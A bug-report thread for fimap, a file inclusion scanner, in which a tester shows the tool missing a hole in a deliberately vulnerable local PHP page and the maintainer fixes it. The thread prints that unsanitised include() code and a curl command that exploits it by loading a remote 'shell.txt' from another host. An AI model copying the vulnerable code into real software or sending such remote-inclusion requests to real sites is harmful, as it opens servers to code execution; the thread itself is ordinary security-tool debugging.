kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0
514 stars 99 forks source link

fimap does not detect vulnerabilities #81

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
On which URL this error occures? (Important!)

Tested URL: http://127.0.0.1/vulnerable.php?COLOR=red

vulnerable.php contents:

<?php
   if ( isset( $_GET['COLOR'] ) ) {
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

Which version of fimap you are using? (You can see that in the very first
line)

v.1.00_svn

On what operating system?

Kali Linux

Please provide any additional information below.

php.ini has the following set and testing the vulnerable code manually works:

allow_url_include = On

For any URL tested, the results are always the same:

SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[14:21:07] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[14:21:07] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(

Original issue reported on code.google.com by doo...@kali.org on 24 Mar 2015 at 4:17

GoogleCodeExporter commented 9 years ago
Hi,

Does this resolve your issue?
https://code.google.com/p/fimap/wiki/BlindMode

If not please leave another comment and I will check it more deeply.

-imax.

Original comment by fimap....@gmail.com on 24 Mar 2015 at 5:58

GoogleCodeExporter commented 9 years ago
Thanks for the reply. Unfortunately, It's still not behaving properly and I've 
pasted the output below for fimap and doing it manually with curl.

root@kali:~/fimap/src# ./fimap.py -u 
"http://127.0.0.1/vulnerable.php?COLOR=red" -b
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[11:30:43] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[11:30:43] [INFO] Fiddling around with URL...
[11:30:43] [INFO] Sniper failed. Going blind...
Target URL isn't affected by any file inclusion bug :(

root@kali:~/fimap/src# curl 
'http://127.0.0.1/vulnerable.php?COLOR=http://172.16.206.148/shell.txt?'
remote shell inside!
root@kali:~/fimap/src#

Thanks!
dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 11:35

GoogleCodeExporter commented 9 years ago
This issue was closed by revision r333.

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:15

GoogleCodeExporter commented 9 years ago
Hi Dookie,

Thank you alot for your report!
I could reproduce this error and fix it.

Please checkout the newest version and let me know if this issue is history.

Again, Thank you alot for your time to report. :)
-imax

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:18

GoogleCodeExporter commented 9 years ago
Tested and confirmed working. Thanks for the quick fix!

dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 3:25